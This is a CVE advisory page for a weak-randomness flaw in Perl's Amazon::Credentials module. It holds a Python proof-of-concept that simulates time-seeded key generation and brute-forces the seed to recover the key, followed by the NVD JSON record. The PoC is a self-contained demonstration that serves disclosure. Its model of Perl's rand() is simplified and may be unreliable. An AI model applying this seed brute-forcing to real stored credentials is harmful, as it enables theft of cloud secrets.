CVE-2026-6146

#!/usr/bin/env python3 """ PoC for CVE-2026-6146 (Weak Randomness in Amazon::Credentials) This script demonstrates how to brute force the seed of Perl's rand() to recover a weakly generated encryption key. """ import random import time # Simulating Perl's rand() behavior (Standard LCG) # Perl typically uses: state = (state * 1103515245 + 12345) & 0x7fffffff RAND_MAX = 0x7fffffff def perl_rand(state): state = (state * 1103515245 + 12345) & RAND_MAX return state / (RAND_MAX + 1.0), state def generate_vulnerable_key(seed): """Simulates the vulnerable key generation logic.""" state = seed key_bytes = b'' # Simulating generating a 64-bit key (8 bytes) using rand() for _ in range(8): val, state = perl_rand(state) key_bytes += bytes([int(val * 256)]) return key_bytes # Scenario: Attacker obtained the encrypted blob and knows the creation time window print("[+] Simulating vulnerability...") # 1. Victim generates a key based on current timestamp (seed) victim_seed = int(time.time()) victim_key = generate_vulnerable_key(victim_seed) print(f"[Victim] Generated Key (Hex): {victim_key.hex()}") # 2. Attacker attempts to recover the key by guessing the seed print("[Attacker] Brute-forcing seed based on time...") start_time = victim_seed - 100 end_time = victim_seed + 100 recovered = False for potential_seed in range(start_time, end_time): test_key = generate_vulnerable_key(potential_seed) if test_key == victim_key: print(f"[SUCCESS] Key recovered! Seed: {potential_seed}") print(f"[SUCCESS] Recovered Key: {test_key.hex()}") recovered = True break if not recovered: print("[-] Failed to recover key within time window.")

{"cve": {"id": "CVE-2026-6146", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-11T20:25:47.597", "lastModified": "2026-05-13T14:18:13.397", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Amazon::Credentials versions through 1.2.0 for Perl uses rand to generate encryption keys.\n\nAmazon::Credentials stores credentials in an obfuscated form to prevent access to the secrets from a data dump of the object.\n\nBefore version 1.3.0, the secrets were encrypted using a 64-bit key that was generated using the built-in rand function, which is predictable and unsuitable for cryptography."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-338"}]}], "references": [{"url": "https://metacpan.org/release/BIGFOOT/Amazon-Credentials-1.2.0/source/lib/Amazon/Credentials.pm#L1415-1418", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/BIGFOOT/Amazon-Credentials-1.3.0/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/11/15", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}